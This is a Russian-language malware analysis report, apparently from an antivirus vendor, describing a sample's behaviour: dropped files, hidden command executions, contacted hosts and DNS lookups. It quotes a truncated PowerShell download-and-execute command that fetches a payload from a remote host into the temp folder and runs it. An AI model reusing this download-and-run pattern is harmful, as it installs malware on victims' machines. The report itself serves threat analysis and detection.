Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $nqlbltajt как %temp%\fioabbu.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Momzuaisoz1([String] $Nqlbltajt){(New-Object System.Net.WebClient).DownloadFile($Nqlbltajt,''%TEMP%\Fioabbu.exe'');Start-Process ''%TEMP%\Fioabbu.exe'';}tr...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1904
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\min-o_d.bat
- %TEMP%\1238523.cvr
Сетевая активность
Подключается к
- 'sw######mmars.vonmammen.org':80
TCP
Запросы HTTP GET
- http://sw######mmars.vonmammen.org/ext/doronsond.png
UDP
- DNS ASK we###opnumij.nl
- DNS ASK sw######mmars.vonmammen.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Momzuaisoz1([String] $Nqlbltajt){(New-Object System.Net.WebClient).DownloadFile($Nqlbltajt,''%TEMP%\Fioabbu.exe'');Start-Process ''%TEMP%\Fioabbu.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\min-o_d.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\min-o_d.bat" "
